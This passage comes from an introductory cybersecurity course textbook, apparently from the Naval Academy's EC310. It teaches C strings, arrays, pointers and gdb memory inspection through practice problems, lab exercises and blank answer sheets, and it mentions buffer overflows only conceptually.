Practice Problem 4.4
Continuing the example above, what would happen if we modified two lines of code as shown below:
school[2] = 'A';
school[3] = 0 ;
printf( "%s\n", school );
Solution:
Changing a string value using strcpy The second way to change a string’s value is with the “string copy” function. The
syntax is
strcpy( s1 , s2 );
This function copies the string s2 to the string s1. When the string s2 is copied over the string s1, the strcpy function
automatically places a closing NULL at the end of the new (modified) string s1.
To use the function strcpy, you must have the following line at the top of your program:
#include<string.h>
One final note about strings. When entering strings from the keyboard don’t use the ampersand: &. For example, to enter a
midshipman's last name from the keyboard, we would use:
char mid_name[24] ;
scanf( "%s " , mid_name );
As an introduction to the dangers inherent in using arrays, you might find it useful to view two videos:
"It came from California… the students were safe… their computers weren't…" :
https://www.youtube.com/watch?v=fj8S6Hd-5bk
What's that you say? You don't see the danger!. Let's watch another video from March 2009 (the first 4 minutes is enough).
http://www.cbsnews.com/videos/the-internet-is-infected/
Practice Problem 4.5
We want to write a C program that declares a string (a character array) and initializes it to "Military Academy", prints this
string to the screen, then, within the program, changes the string to the name of your favorite college, and then, once again,
prints the string to the monitor.
Your program output should appear as shown below:
Fill in the three missing lines of code.
Solution:
#include <stdio.h>
#include<string.h>
int main()
{
103
char phrase[]
= "Military Academy" ;
}
Practice Problem 4.6
Answer the questions about the character string in memory shown below, where the first element in the string is 0x53.
(a)
What is the minimum number of bytes that could have safely been allocated for this string ?
(b)
Write this declaration, naming the array 'myString' .
(c)
What is the address of 'myString[0]' ?
(d)
What character is at myString[1]?
Solution:
(a)
(b)
(c)
(d)
Practice Problem 4.7
(a) Write the declaration for an array named LuckyNumbers which will hold 6 integers.
Solution:
(b) Complete this statement to display the 4th LuckyNumber:
printf("The fourth lucky number is %d\n",
Solution:
printf("The fourth lucky number is %d\n",
(c) What happens if I attempt to display LuckyNumbers[9]?
i. Will it return a value?
ii. Will I receive an error message?
iii. Will the program crash?
Solution:
i:
ii:
iii:
104
);
);
Problems
1.
2.
To create a variable that contains a letter of the alphabet:
a) What data type will I need to use?
b) What special data structure will group a collection of these letters into a word or sentence?
Consider the section of main memory shown below. The address of one of the individual bytes is also shown on the figure.
The decimal (base-10) integer value of 150 is stored at address 00003D18.
a) On the picture above, show how the value of 150 would be stored in main memory. Use hexadecimal notation.
b) Annotate the diagram above to show the addresses for each byte in memory that is depicted on the figure (so that all
nine bytes have the proper address shown).
What would be displayed on the monitor by the command: x/xb
0x00003D18 ?
d) What would be displayed on the monitor by the command: x/xh
0x00003D18 ?
What would be displayed on the monitor by the command: x/xw
0x00003D18 ?
c)
e)
3.
Move the program char_array2.c from the booksrc directory to your work directory. Run the code with the
debugger by entering the seven lines of code shown on page 85 of Chapter 3, EXCEPT instead of the line "break main"
use "break 6". This will insert a breakpoint at line 6 (which should correspond to the blank line in the code listing).
Thus, you will run the program up to the breakpoint at line 6.
a) In words (a sentence or two), what does this program do?
b) At the breakpoint (where your program stops), what is the value of the instruction pointer?
c) At the breakpoint, what would be the result of entering x/i $eip ?
105
4.
Consider the picture below, where all memory contents are in hexadecimal:
a)
In words: what is held in the eip register, i.e., what is the purpose of this register? (Your answer should not be:
"804838d".)
b) What would be displayed on the monitor by the command: i r eip ?
c)
What would be displayed on the monitor by the command: x/xb $eip ?
d) What would be displayed on the monitor by the command: i r esp ?
5.
6.
7.
e)
What would be displayed on the monitor by the command: x/xw $esp ?
f)
What would be displayed on the monitor by the command: x/xb
0x08048475 ?
g) What would be displayed on the monitor by the command: x/xs
0x08048475 ?
What is the fundamental issue with C that makes a buffer overflow exploit possible?
Use the array declaration to answer the questions.
float wins[6] = {3.4,7,4,6.1,9,10};
a) How many bytes are allocated for this array?
b) What value is stored in wins[1]?
c) What value is stored in wins[6]?
Let’s pretend there are 5 students in EC310. We want to write a C program that declares an array named EC310midterm
that will hold the midterm grades for the class. The program should allow the user to enter the midterm grades at runtime,
and should then print out the average of the midterm grades. Here is an example of how the program should appear:
Since your EC310 instructors "exist to serve", they have provided you with the source code. Since your EC310 instructors
also have a mean streak, they have left several strategic lines of code missing.
#include <stdio.h>
int main()
{
int num_students = 5;
106
float EC310midterm[
];
int number;
float sum = 0;
float average;
for (
;
;
{
printf( "Enter score for student %d : " , number + 1);
scanf( "%f" ,
&EC310midterm[ number ]
)
);
sum = sum +
;
}
average =
;
printf( "Class midterm average: %f \n" , average );
}
8.
Enter this program, filling in the correct (missing) lines of code. Run the program to ensure it works correctly. It is
recommended that you type this code, rather than cut-and-paste. Turn in a copy of your source code and a screen capture
of your program successfully running. (Note: To perform a screen capture, hold down the Control, Alt and PrintScreen keys, all at the same time. This will save a picture of the screen to the clipboard which you can paste it into an
MSWORD doc.)
In the program presented in Problem 7 above, if the line of code:
EC310midterm[5] = 100 ;
was added to the end of the existing code, would the program still compile? If so, describe what we might expect the effect
to be.
107
108
Security Exercise 4
Part 1: Initial Set-Up
Your instructors have prewritten three of the C programs that you will use for this lab, and have placed them in the ec310code
directory. We have done this because we care. 10 The programs you will use today are named sx4a.c , sx4b.c and
sx4c.c and these three programs are sitting in the ec310code directory:
We need to copy these files to the work directory. To copy them from the ec310code directory to the work directory,
carefully enter the following at the home directory prompt:
midshipman@EC310:~ $
cp
ec310code/sx4a.c
Make sure you are at your home directory!
work
Enter this!
Now carefully enter the following two lines at the home directory prompt
midshipman@EC310:~ $
cp
ec310code/sx4b.c
work
midshipman@EC310:~ $
cp
ec310code/sx4c.c
work
If all went well, you should have a copies of sx4a.c , sx4b.c and sx4c.c in your work directory.
Verify that you have sx4a.c , sx4b.c and sx4c.c in your work directory by changing to the work directory: cd work
and then listing the files in the work directory: ls.
If you do not have sx4a.c , sx4b.c and sx4c.c in in your work directory STOP and ask your instructor or lab tech for
help. Otherwise, proceed to Part 2.
10
ECE: The Caring Department.
109
Part 2: Fun with Navy
You should now be in the work directory:
Examine the program sx4a.c using nano. The C program is shown below:
Who am I?
#include<stdio.h>
#include<string.h>
int main( )
{
char school[ 5 ] ;
school[
school[
school[
school[
school[
0
1
2
3
4
]
]
]
]
]
=
=
=
=
=
‘N’
‘a’
‘v’
‘y’
0 ;
;
;
;
;
printf( "%s\n" , school );
}
Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using
gcc –g sx4a.c
and then run your program
./a.out
to confirm it executes as expected.
If your program is not working STOP and ask your instructor for help. Otherwise, proceed to Part 3.
Part 3: Wa?
Now, using nano change the line
char school[ 5 ] ;
to read
char school[ 10 ] ;
and rerun your program.
Question 1: What effect did this modification have on your program’s output. Explain.
Now, we would like to modify our program so that it prints out: Wavy instead of Navy. Change one line of code in your
program to accomplish this. Do not use strcpy for this question. Verify your solution works.
Question 2: What change did you make to your program?
110
Now change the line
school[ 2 ] = ‘v’ ;
to read
school[ 2 ] = 0 ;
(Note that the line of code contains the number zero, not the letter oh.)
Question 3: What output is produced? Why is this output produced?
Now, change the line
school[ 2 ] = 0 ;
back to its original form:
school[ 2 ] = ‘v’ ;
but change the array declaration line
char school[ 10 ] ;
to read instead:
char school[ 2 ] ;
So, we are telling C that we intend that our character string only have two characters (and remember, one of them should be
the NULL character.
Run the program.
Question 4: What was printed out? Did the program realize you only wanted the array to have two items? Explain.
If you feel very confident in your answer to Question 4, go on to Part 4. Otherwise, STOP and ask your instructor for help.
Part 4: Out of Bounds
Examine the program sx4b.c using nano. The C program is shown below:
#include <stdio.h>
#include <string.h>
int main()
{
int count[3] = { 1 , 2 , 3 };
int j;
for ( j = 1 ; j <= 3 ; j = j + 1 )
{
printf("The next number is %d\n" ,
}
count[j] );
}
Compile and run the program.
Question 5: What was printed out? Explain.
Question 6: How would you fix the program so that it prints out:
The next number is 1
The next number is 2
The next number is 3
Make this fix to your code and have your instructor verify that your program works properly.
After you have Question 6 signed off, proceed to Part 5.
111
UNIX Tips and Tricks
UNIX provides another feature to lessen the amount of typing that busy midshipmen have
to perform.
UNIX attempts to complete our commands for us, using a feature called tab completion.
To use tab completion, you type in part of a command, and then hit the tab key. UNIX will
attempt to complete the command for you (or may partially complete the command).
For example, suppose I have been editing the file smith_4_1.c, and have opened and closed this file several times
already. If I now type:
midshipman@EC310-VM:~ $ nano s
and then hit the Tab key, UNIX will automatically complete the command for me:
midshipman@EC310-VM:~ $ nano smith_4_1.c
Similarly, I find that if I type
midshipman@EC310-VM:~ $ ./a
and then hit the Tab key, UNIX will automatically complete the command for me:
midshipman@EC310-VM:~ $ ./a.out
Tab completion is very useful. Keep in mind that if UNIX cannot decide how to complete your
command (since you have not provided enough characters to start with), enter another character or two
and press Tab again.
Part 5: Joys of strcpy
Examine the program sx4c.c using nano. The C program is shown below:
#include <stdio.h>
#include <string.h>
int main()
{
char slogan[16] = "Cyber 2 is fun!" ;
printf("\n%s\n\n" , slogan );
}
Compile and run the program.
Question 7: Why did I choose to make the array size equal to 16. There are only 15 characters in the string Cyber
2 is fun!
Carefully add the following two lines to your program above, right before the closing brace.
strcpy( slogan , "Cyber rocks!" );
printf("\n%s\n\n" , slogan );
Compile and run the program.
Question 8:
What was printed out? Explain.
Your friend is confused. He looks at the length of the two strings:
C y b e r
2
i s
f u n !
- - - - - - - - - - - - - - C y b e r
r o c k s !
and wonders why the second item printed out wasn't Cyber rocks!un!. In other words, he wonders what happened to the
un! that finished the string Cyber 2 is fun!, since those last few characters were not overwritten.
Question 9:
What is the answer to your friend's question? Explain.
112
Security Exercise 4 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
__________________________
Instructor/Lab Tech signature
Question 7:
Question 8:
Question 9:
113
114
Chapter 5: Intro to Pointers
Objectives:
(a) Explain the operation of the address operator.
(b) Describe the relationships that exist between pointers, arrays and strings.
(c) Differentiate between the value of a pointer and the address of a pointer.
Let me give you some pointers for passing
EC310:
0x0335a438
0x0826d210
0x0447ab36
Ha ha ha ha ... ha… er… ha?
1. Pointers
1.1. Why Use Pointers? Consider your favorite database: MIDS. Suppose you tell the registrar that you want to register for
the following courses:
HU222:
HH333:
FP444:
EC310:
Football Theory
History of Embarrassing Air Force Scandals
Cicero’s Impact on Renaissance Poetry as Developed for Theatre circa 1700
Cyber Security II
Now, other people also have to use (and possibly modify) your record in the MIDS database. Your advisor has to check that
you are on track for your major. Your instructors have to enter grades into your record. The Dean may have to annotate your
matrix with a note saying that one course counts for another course. Various people may have to enter conduct offenses.
So, let’s say that it comes time for your HU222 instructor to enter your six-week grade. How can this be accomplished? Recall
that the MIDS database, as with everything else a computer uses, resides in memory.
One option would be for the registrar to send your HU222 instructor a copy of the entire MIDS database, with a note: “Update
the database, and then send it back to me.”
This involves the duplication and movement of vast amounts of data. Can you think of a better way?
A better way would be to let the instructor modify the actual database… not a copy of the database. But how can that be done?
Suppose your instructor was given the address of the MIDS database in memory. Then, any changes made to the contents of
a memory location are actual changes to the MIDS database! In other words, instead of sending someone the MIDS database,
we simply tell them: "Here is the address of the MIDS database, go make your changes directly".
1.2. Addresses Recall from week one of the course that all variables have




a type
a name (also called an identifier)
a value (possibly a garbage value)
an address
115
We will focus on this notion of a variable’s address. Addresses are 4 bytes (32 bits) long. Since people don’t like reading 32bit binary numbers…
Hey! I like reading 32-bit binary numbers!!!
CORRECTION…since most people don’t like reading 32-bit binary numbers, the shorthand hexadecimal notation is used.
As mentioned previously, memory locations are usually given in hexadecimal notation.
Practice Problem 5.1
If the first byte of a variable is stored at memory location numbered:
00000000000100101111111101111100
what is this address in hexadecimal notation?
Solution:
0000
0000
0001
0010
1111
1111
0111
1100
Practice Problem 5.2
For our x86 architecture, how many hexadecimal digits are in an address?
Solution:
1.3. The address operator &
& (the ampersand sign) is the address operator which is used to access the address of a
variable. &variable returns the address of variable. So, if we have a variable named y, then &y returns the address of y.
To examine how the ampersand operator behaves, consider the program below, along with its associated output.
Recall:
%d is used for integers
%x is used for hexadecimal
#include<stdio.h>
int main()
{
int current_year = 2014;
printf("\nThe year is %d and the address is %x \n"
current_year, &current_year);
}
116
,
1.4. Assigning Values to Pointers A pointer is a variable that holds a memory address, usually the address of another
variable. Put another way, a pointer is a data type that holds the hexadecimal address of another variable. Put a third way: A
pointer variable “points to” another variable. A pointer variable is itself stored in 4 bytes.
Declaring Pointers A pointer variable is declared by using the asterisk. For example, the declaration
data_type
*pointer_name ;
means:
"I am declaring a pointer named pointer_name that will point to another variable of type data_type".
For example, consider the declaration
float *a_ptr ;
What does this mean? It means that we have told C that we would like to have a pointer variable named a_ptr that will be
used to point to some float variable (but it does not point anywhere yet!).
Assigning Values to Pointers. Recall that a pointer variable holds an address. To assign the correct address to a pointer
variable, we use the & operator (the address operator). Let's consider the code snippet below:
int a = 131;
int *a_ptr ;
a_ptr = &a;
Let's look at this code snippet line-by-line.
The very first line (int a = 131;) tells the compiler that you want to use a variable named a, of type integer, that will be
initialized to the value of 131. The compiler will place the value of a on the program's stack (recall that the stack is the
section of memory that a program has available to hold its variables and any other data it needs to perform its operation).
The operating system (not you, the programmer) will decide the precise address of where the variable a will be placed. Let's
presume that the compiler has chosen to store the variable a at address 0056DE73.
The second line of code (int *a_ptr;) tells the compiler that you want to use a pointer variable named a_ptr, that will
(at some time later in its life), point to variable of type int. This variable must also be stored on the stack. Let's presume that
the compiler has chosen to store the variable a_ptr at address 0056DA61.
117
Finally, the third line of code (a_ptr = &a;) places the address of a into the variable a_ptr.
Practice Problem 5.3
Consider the program shown below, along with its corresponding output.
#include<stdio.h>
int main()
{
int a = 4;
int *a_ptr;
a_ptr = &a;
printf("\nThe value of a is %d and the address is %x \n" , a , &a );
printf("\nThe value of a_ptr is %x and the address is %x \n\n",
a_ptr , &a_ptr) ;
}
In the picture shown below:
(a) Fill in the two red circles.
(b) Draw an arrow showing where a_ptr is stored on the stack.
(c) Annotate the figure to show the value of a_ptr.
118
Pointers are confusing! Some argue that pointers are the greatest source of bugs in C programs. In fact, some modern
programming languages (such as Java) have eliminated pointers altogether since pointers are so confusing and lead to so many
errors.
But it is precisely because pointers are confusing that leads to their use by adversaries. Almost all program attacks involve the
use or abuse of a pointer.
The Morris worm… Conficker… Stuxnet… these all employ a buffer overflow attack. The key to understanding this attack
involves understanding pointers.
1.5. Arrays and Pointers Recall our discussion of arrays from last lecture. We mentioned that if we declare an array with
float pay[4];
the compiler will reserve four consecutive memory location, each of which will hold a float variable. The four variables are
pay[0] , pay[1] , pay[2] and pay[3]. The array of all four variables is named pay.
Recall also that in the C programming language, strings—i.e., sequences of characters—are stored as arrays of characters. Here
is an example of declaring a string variable using a character array:
char school[20] = "US Naval Academy";
The array named school holds 17 characters:
school[0]
school[1]
school[2]
school[3]
=
=
=
=
'U'
'S'
' '
'N'
etc., etc.,
school[16] =
0
So… we can see what school[1] is (it’s a character… the character 'S' to be exact), but what exactly is the array name
school by its lonesome…without an index? Let's see!
#include<stdio.h>
int main()
{
char school[20] = "US Naval Academy" ;
printf("\nThe value of school is %x \n\n"
}
119
, school ) ;
We have output an address…school was holding an address… school is a pointer. The bottom line is: An array name is
a pointer! When we declare an array, C generates a pointer, which is assigned the address of the first element of the array.
Consider the declaration
int a [4];
What really happens is:
int *a = &a[0];
a[0]
11
a points here
a[1]
a[2]
a[3]
For strings, we can tell C to print out a string by using the array name and the string format specifier. If we changed our
program to:
#include<stdio.h>
int main()
{
char school[20] = " US Naval Academy" ;
printf("\nThe value of school is %s \n\n"
, school ) ;
}
Only change! The old x is changed to an s.
then the output would be:
Practice Problem 5.4
Recall that in RAM you have stored the machine language code for your program as well as additional memory allocated for
your variables within the program. This latter additional memory is called the stack.
You type into the debugger the command
i r ebp
and get the result 0xbffff818. The register ebp points to the "bottom" of the stack.
Upon further review of the assembly code you determine that two strings are stored in memory, one at address ebp-40 and
the other at ebp-24. (Note that the numbers 40 and 24 are ordinary base 10 numbers, not base-16.) What are the two hidden
words?
Solution:
ebp
11
bffff818
It should be pointed out that this is not a line of valid C code. Our meaning is to convey: It’s as if this happened…
120
Practice Problem 5.5
A large program contains the following lines of code
int a = 11;
int b[2];
b[0] = 10;
b[1] = 6;
A section of this program's stack is shown below.
Address
0xBFFFF8F0
0xBFFFF8F1
0xBFFFF8F2
0xBFFFF8F3
0xBFFFF8F4
0xBFFFF8F5
0xBFFFF8F6
0xBFFFF8F7
0xBFFFF8F8
0xBFFFF8F9
0xBFFFF8FA
0xBFFFF8FB
0xBFFFF8FC
0xBFFFF8FD
0xBFFFF8FE
0xBFFFF8FF
0xBFFFF900
0xBFFFF901
0xBFFFF902
Data
0x3E
0x 3F
0x 4A
0x 0A
0x 00
0x 00
0x 00
0x 06
0x 00
0x 00
0x 00
0x 0B
0x 00
0x 00
0x 00
0x 4D
0x 08
0x 2C
0x 33
What would be the result of the statement:
printf(“The address of array b is %x \n”, b);
Solution:
Practice Problem 5.6
Recall that in RAM you have stored the object code for your program as well as additional memory allocated for your variables
within the program.
You type into the debugger the command: i r ebp and get the result 0xbffff810. Upon further review of the assembly
code you determine that two integers are stored in memory, one at address ebp-8 and the other at ebp+4. What are the hidden
decimal numbers?
121
An
Aside
Why does scanf sometimes require an ampersand in front of the variable's name
and sometimes not?
Recall that scanf is another name for the keyboard. When the writers of the C programming
language designed the scanf statement, the intent was that the item into which the keyboard
input is placed would be provided as an address.
What does that mean? That means that when we have a scanf statement, such as
scanf("%f" , &year_number
);
the place where we deposit the keyboard input, shown as a red box in the statement above, must be an address. That is
simply the way the C language was written.
So if we declare a variable of, say, type float as in
float
EC310_factor ;
and we want to read in the value of the EC310_torture_factor from the keyboard, we cannot do this:
scanf("%f" , EC310_factor );
Error! Bad!
The reason we cannot do this is because EC310_torture_factor is not an address, and the scanf statement always
expects that you will provide it an address into which to deposit the keyboard input.
So, we can place the value read in from the keyboard into the variable EC310_torture_factor by providing the
address of EC310_torture_factor using the address operator:
scanf("%f" , &EC310_torture_factor );
Correct! Good!
Knowing how the scanf statement was designed should provide insight into how strings are entered from the keyboard.
Last lecture that we mentioned that when entering strings from the keyboard, you don’t use the ampersand: &. For example,
to enter a midshipman's last name from the keyboard, we would use:
char mid_name[24] ;
scanf( "%s " , mid_name );
Note: No ampersand in front of mid_name !
The reason: Recall from Section 1.5 above that an array name is a pointer—when we declare an array, C
generates a pointer, which is assigned the address of the first element of the array. So, in this
particular case, mid_name is an address already, so we do not add the ampersand!
OPTIONAL: For your reading and viewing pleasure, here is an example of a “buffer overflow attack”. We will discuss the
buffer overflow in greater detail, but for now, let's just watch a Pre-Snowden video:
http://www.cbsnews.com/video/watch/?id=7400904n (first 6-7 minutes)
122
Problems
1.
Examine the program char_array.c which already exists in the booksrc directory.
(a) How does a program know it has reached the end of a string?
(b) How many more characters could legitimately fit into this particular string?
2
Given the string declaration below, mark each strcpy()function call as Safe (S) if the string literal can be safely
stored in the array, or Unsafe (U) if the string literal cannot be stored safely in the array. The array is declared as:
char President[8];
(a)
(b)
(c)
(d)
3.
strcpy(
strcpy(
strcpy(
strcpy(
President
President
President
President
,
,
,
,
"Monroe\n");
"Polk\t");
"Cleveland\n");
"Garfield");
Given the following variable declarations:
int foo;
char *bar;
and the following memory layout (all values in hexadecimal and little endian):
bar
foo
080483A0
080483A4
080483A8
080483AC
42
4F
A0
05
52
21
83
DB
41
00
04
66
56
00
08
72
What is the value of:
(a) &foo (in hex)
(b) foo (in decimal)
(c) bar (in hex)
(d) &bar (in hex)
(e) If we were to print out the string named bar what would be printed out?
4.
Given the following declarations, what would be the C statement to assign ptr_age the address of the integer age?
(Circle the correct answer)
int
int
(a)
(b)
(c)
(d)
(e)
5.
age;
*ptr_age;
&ptr_age = &age;
*ptr_age = &age;
&ptr_age = *age;
ptr_age = age;
ptr_age = &age;
Given the following C snippet, what would the output of the printf statement be?
char name[40] = “LCDR Atwood”;
char *ptr1;
char *ptr2;
ptr1=name;
ptr2=ptr1 + 6;
strcpy(ptr2,”good day by all!”);
printf(“My teacher is %s\n”, name);
123
124
Security Exercise 5
Part 1: Initial Setup
Who am I?
Your instructors have prewritten two C programs that you will use for
this lab, and have placed them in the ec310code directory. The
two programs you will use today are named sx5a.c and sx5b.c .
Copy these two files from the ec310code directory to the work directory
by carefully entering the following two lines at the home directory prompt:
midshipman@EC310:~ $
cp
ec310code/sx5a.c
work
midshipman@EC310:~ $
cp
ec310code/sx5b.c
work
Make sure you are at your
home directory!
Enter this!
If all went well, you should have copies of sx5a.c and sx5b.c in your
work directory. Verify that you have sx5a.c and sx5b.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory: ls
If you do not have sx5a.c and sx5b.c in in your work directory STOP and ask your instructor or lab tech for help.
Otherwise, proceed to Part 2.
Part 2: Go Navy
You should now be in the work directory:
Examine the program sx5a.c using nano. The C program is shown below:
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
printf( "%s\n" , phrase );
}
Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using
gcc –g sx5a.c
and then run your program: ./a.out . If your program is not working as expected STOP and ask your instructor for help.
Otherwise, proceed to Part 3.
125
Part 3: Memory
The array named phrase is a string, and the contents of this string are stored in main memory on the program's stack. We
would like to determine the starting address of the string. By using nano, change only a single character in statement
printf( "%s\n" , phrase );
to determine the main memory address of where the string named phrase begins. Compile and execute your program.
Question 1: What was the single character you changed?
Question 2: How many bytes of memory are required to hold a single character?
Question 3: Looking at your source code, what character should be stored at phrase[ 1 ] ?
Question 4: Looking at your source code, what character should be stored at phrase[ 8 ] ?
Question 5. Complete the printf statement that would allow you to see the address of the character stored at
phrase[1] (don't actually make the change using nano, just state what you would do):
printf(
"The address of phrase[1] is %x " ,
______________ ) ;
Question 6: Sketch how your array should be stored in memory in the picture shown on your answer sheet. Each box
represents a byte in memory. Assume that the array named phrase points to the location shown, and that memory
locations are increasing going down the page. For this question all you need to do is fill in the ASCII characters that
are stored in each memory location.
If, in answering Question 1 above, you made a modification to your program, restore the program to its original form as
shown on the prior page.
Carefully modify your C program (using nano) so that it contains the three new lines shown in bold italics:
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
Add these two lines. (You can also
add blank lines around these two new
lines if you wish.)
char *ptr;
ptr = phrase;
printf( "%s\n" , phrase );
printf( "%s\n" , ptr );
Add this line. (Also add blank lines if
you wish.)
}
Compile and execute your program, examining the output. If your program is not compiling STOP and ask your instructor for
help. Otherwise, proceed to Part 4.
126
Part 4: Go Navy Navy
Recall that phrase, the name of an array, is really a pointer to an array of characters. In fact, phrase holds the address of
the first element of the array. And the variable ptr is also a pointer.
Question 7: The line of code
ptr = phrase;
is an assignment statement. What is being assigned to what?
Question 8: Explain your program's output.
Carefully modify your C program so that it contains the three new lines shown in bold italics:
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
char *ptr;
ptr = phrase;
Add this line.
char *another_ptr;
printf( "%s\n" , phrase );
printf( "%s\n" , ptr );
another_ptr = ptr + 3 ;
printf( "%s\n" , another_ptr );
}
Add these two lines.
Compile and execute your program. If your program is not compiling STOP and ask your instructor for help. Otherwise,
proceed to Part 5.
Part 5: Army Strikes Back
Question 9: Explain your program's output.
Question 10: In the same sketch as Question 6, fill in:


the location where ptr points to.
the location where another_ptr points to.
Carefully modify your C program to add the two new lines shown in bold italics (do not worry about the presence or absence
of blank lines in your code):
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = “Go Navy!” ;
char *ptr;
ptr = phrase;
char *another_ptr;
printf( "%s\n" , phrase );
printf( "%s\n" , ptr );
another_ptr = ptr + 3 ;
printf( "%s\n" , another_ptr );
strcpy( another_ptr , "Army!" );
printf( "%s\n" , ptr );
}
127
Add these two lines.
Recall that the strcpy command provides a means for changing the values of the characters stored in a string.
Ensure that you use strcpy to change another_ptr , not ptr (see the code above).
Note that we then, in the last line of code, use ptr in the printf command.
Compile and execute your program, examining the output.
Question 11: Explain the last line of output produced by the program. Specifically, why did the value of the string
named ptr change (as reflected by the last line of output) when all you did using the strcpy command was change
a different string (the string named another_ptr). Phrasing this question another way: Your program above never
directly changes ptr after the line
ptr = phrase;
but—somehow—the value printed out by the last line reflects a change. What caused this?
If you are baffled, STOP and ask your instructor for an explanation. Otherwise, proceed to Part 6.
Part 6: Autopsy of the Program
Recall that when we execute a program, it is moved from secondary memory (e.g., the hard disk) to main memory (RAM).
The particular program's machine language code is moved into main memory, and the program is also given additional space
in main memory (called the stack) that it can use to store variable values that it needs to execute.
In the figure shown below, the machine language code has been moved into main memory starting at address 0x08048374
and the program's stack is between memory locations 0xbfffff71 and 0xbfffff73.
Note that our program is not "stored in the CPU." Rather, the program is stored in main memory.
The CPU can interact with the program via the three registers that we have learned about:

The eip register holds the address of the next instruction that will be executed (but has not yet been executed).

The esp register points to the "top" of the stack.
128
 The ebp register points to the bottom of the stack.
Note in the figure above the values of the eip, esp and ebp registers.
Now, the gdb debugger can be thought of as a microscope that allows us to examine in detail the CPU registers and memory.
We have seen that we can use the info command to examine registers. For example, in the context of the figure above, if I
entered
i r eip
I should obtain the value of 0x08048374.
Similarly, if I entered
x/xb
0x08048374
I should see the value 0x55.
We will examine a program using the debugger, and show in particular how we can use the names of pointer variables in
debugger commands. And at the end of this Security Exercise (no peeking!) we will show you a useful enhancement to the
examine command.
Enough of program sx5a.c . I'm sure you are sick of that program! Let's move on to sx5b.c !!! Using nano examine
the program sx5b.c . The C program is shown below:
#include<stdio.h>
#include<string.h>
int main( )
{
char phrase[ 10 ] = "Go Navy!" ;
char *ptr;
ptr = phrase;
char *another_ptr;
printf( "%s\n" , phrase );
printf( "%s\n" , ptr );
another_ptr = ptr + 3 ;
printf( "%s\n" , another_ptr );
strcpy( another_ptr , "Army!" );
printf( "%s\n" , ptr );
129
}
Note that this is the same program that you left off with, but we have cleaned it up (e.g., to remove unnecessary blank lines).
DO NOT MAKE ANY CHANGES TO THIS PROGRAM!
Let’s use the debugger to examine the program on prior page a bit more closely. Type the following at the prompt. Do not
type the comments!
gcc –g sx5b.c
// The –g provides extra functionality for the debugger.
gdb –q
// Recall that gdb is the name of the debugger.
./a.out
set dis intel
// This displays the assembly code in standard Intel lingo
list
// This repeats the source code for convenience
<Enter>
// Just hit the Enter key. This displays the remainder of your source code
break 13
// This sets a “breakpoint” at line 13. This is the next to last line of your
// program – the line that uses strcpy.
run
// This starts executing the program up to the breakpoint.
After entering all of these commands, your program will have executed up to but not including line 13. Line 13 is the next to
last line of your program – the line that uses strcpy.
Let's find out the address that phrase holds (remember, the name of an array such as phrase holds the address of the first
element in the array). We would also like to know actual contents of this address.
Let’s do this by typing
x/xb phrase
You should see:
(gdb) x/xb phrase
0xbffff800:
0x47
(Note: You may see a number slightly different from 0xbffff800, but you should see the value of 0x47. If you do not see
the value of 0x47 then STOP and ask your instructor for help.)
Let's explain the command you just entered. Recall that the first x invokes the examine command, the second x specifies
hexadecimal, and the b asks the debugger to display a single-byte quantity. When the examine command is used with array
names or pointer variables (such as phrase, ptr and another_ptr), the first item returned will be the contents of the
pointer and the second item returned will be the value that the pointer is pointing to.
(gdb) x/xb phrase
0xbffff800:
0x47
The address stored
in phrase.
The memory contents of this
specific address.
Question 12. Fill in the picture shown on the answer sheet, showing the contents of phrase, and the hexadecimal
value stored in the memory location pointed to by phrase. (Note that this figure will be gradually filled in as we
complete this lab; for this question, you are only being asked to show the contents of phrase, and the value stored
in the memory location pointed to by phrase.)
Question 13. What on earth does that 0x47 represent?
Question 14. Determine what is stored at the memory location that phrase contains by examining the memory
directly using the command:
x/xb 0xbffff800
130
Question 15. On the same figure as Question 12, fill in the contents of ptr and another_ptr. These are both
pointers so your answers should be addresses.
Question 16. On the same figure as Question 12, draw arrows showing where phrase, ptr and another_ptr
all point to; i.e., draw an arrow from the pointer to the memory location with the corresponding address.
Question 17. On the same figure as Question 12, show the hexadecimal values stored in the memory locations pointed
to by these three pointers phrase, ptr and another_ptr.
Question 18. The pointer named another_ptr seems to be pointing to the value 0x4e. What is that?
Question 19. On the same figure as Question 12, fill in the addresses of each byte of main memory depicted on the
figure (placing the address to the left of the byte), and fill in the contents of each memory location as ASCII characters.
You should do this by using the debugger to examine memory one byte at a time. For example, if I wanted to examine
the memory location 0xbffff801 I would enter
x/xb 0xbffff801
When you have completed your picture, STOP and show it to your instructor. If correct, you can proceed to Part 7.
Part 7: Further Autopsy of the Program
Recall that our program has executed up to but not including line 13. Line 13 is the next to last line of your program – the line
that uses strcpy.
Now, execute the program (using nexti ) until you show line 14 as the next instruction to execute. In other words, keep
entering nexti until you see:
14
printf( "%s\n" , ptr );
It should be the case that you have to enter nexti four times to see the line shown above.
Question 20. Fill in the picture shown on the answer sheet in its entirety, showing the memory address of all bytes,
the contents of all bytes (as ASCII characters) and the contents of the pointers.
Now, the C line of code:
printf( "%s\n" , ptr );
goes to the memory address pointed to by ptr, and starts printing out characters in memory, one after another, until a NULL
is reached.
Question 21. What will be printed out by the next statement (printf( ptr ); )?
Question 22. You friend is confused. He says: “We never made any changes involving ptr – we only made changes
to another_ptr (using the strcpy command).” So, why did we get different results when we executed the line
printf( ptr ); ? How do you reply?
We can type out multiple bytes with a single x/xb command by specifying the number of bytes to display. For example, we
can print out a single byte starting at the address pointed to by phrase by typing
x/xb phrase
But, if we want to see, say, 8 bytes of data starting at the address pointed to by phrase, we can type
x/8xb phrase
Question 23. Explain the meaning of the results that you see when you enter x/8xb phrase.
131
Question 24. Explain the meaning of the results that you see when you enter x/8c phrase.
132
Security Exercise 5 Answer Sheet
Name: _____________________
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6 and Question 10:
Question 7:
Question 8:
Question 9:
Question 11:
133
Question 12, Question 15, Question 16, Question 17, Question 19
Question 13:
Question 14:
Question 18:
Question 20:
Question 21:
Question 22:
Question 23:
Question 24:
134
Chapter 6: Functions and the Stack
Objectives:
